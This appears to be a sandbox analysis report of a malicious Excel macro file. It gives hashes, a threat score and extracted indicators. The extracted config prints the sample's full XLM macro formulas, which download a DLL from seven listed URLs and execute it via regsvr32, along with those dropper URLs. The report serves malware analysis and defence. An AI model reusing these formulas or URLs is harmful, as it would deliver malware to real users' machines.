Overview

overview

10

Static

static

10

28e2a58743...9.xlsm

windows7-x64

10

28e2a58743...9.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    28e2a587439b687fbb213fa32d3ddc8edd92e295cd788d5e42005dac1159cf69

  • Size

    32KB

  • Sample

    241121-ashdlswfme

  • MD5

    96edfaa4cc37d7db9713cc2a68de53c8

  • SHA1

    74b26a8ecae65ebf51cd182e3926e80dae428e1b

  • SHA256

    28e2a587439b687fbb213fa32d3ddc8edd92e295cd788d5e42005dac1159cf69

  • SHA512

    bbc7ebc84a4615b892c32163a4365296f7ab1a85ad26d6ae266b8cfe1f942f3db29493f1c141bc9d8ae23d1b8c87418336c9f219bd600ca449db079845f9a4e6

  • SSDEEP

    768:gjf8WFhN7beEizXT2LxdFfPdkqstJVE6D:6EsTXrgXUndkq8E6D

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.alejandrovillar.com/MSL/eKDWjpa4OHRxpysOTFe/

https://alejandrastamateas.com/web/ZxA3zHwsH3r/

https://alexetaurore.com/wanted/pfFtzaJovICU81kfuUp/

http://ayursoukhya.org/wp-includes/XI35qPGHvszZ1u/

http://balibuli.hu/cgi-bin/WDDM0VHSK4VcOFmU/

https://aldibiki.com/prettyPhoto/gLFRzQV0VunO/

https://al-brik.com/vb-w/U/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.alejandrovillar.com/MSL/eKDWjpa4OHRxpysOTFe/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alejandrastamateas.com/web/ZxA3zHwsH3r/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alexetaurore.com/wanted/pfFtzaJovICU81kfuUp/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ayursoukhya.org/wp-includes/XI35qPGHvszZ1u/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://balibuli.hu/cgi-bin/WDDM0VHSK4VcOFmU/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aldibiki.com/prettyPhoto/gLFRzQV0VunO/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb-w/U/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.alejandrovillar.com/MSL/eKDWjpa4OHRxpysOTFe/
xlm40.dropper

https://alejandrastamateas.com/web/ZxA3zHwsH3r/
xlm40.dropper

https://alexetaurore.com/wanted/pfFtzaJovICU81kfuUp/
xlm40.dropper

http://ayursoukhya.org/wp-includes/XI35qPGHvszZ1u/
xlm40.dropper

http://balibuli.hu/cgi-bin/WDDM0VHSK4VcOFmU/
xlm40.dropper

https://aldibiki.com/prettyPhoto/gLFRzQV0VunO/
xlm40.dropper

https://al-brik.com/vb-w/U/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.alejandrovillar.com/MSL/eKDWjpa4OHRxpysOTFe/
xlm40.dropper

https://alejandrastamateas.com/web/ZxA3zHwsH3r/

Targets

    • Target

      28e2a587439b687fbb213fa32d3ddc8edd92e295cd788d5e42005dac1159cf69

    • Size

      32KB

    • MD5

      96edfaa4cc37d7db9713cc2a68de53c8

    • SHA1

      74b26a8ecae65ebf51cd182e3926e80dae428e1b

    • SHA256

      28e2a587439b687fbb213fa32d3ddc8edd92e295cd788d5e42005dac1159cf69

    • SHA512

      bbc7ebc84a4615b892c32163a4365296f7ab1a85ad26d6ae266b8cfe1f942f3db29493f1c141bc9d8ae23d1b8c87418336c9f219bd600ca449db079845f9a4e6

    • SSDEEP

      768:gjf8WFhN7beEizXT2LxdFfPdkqstJVE6D:6EsTXrgXUndkq8E6D

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks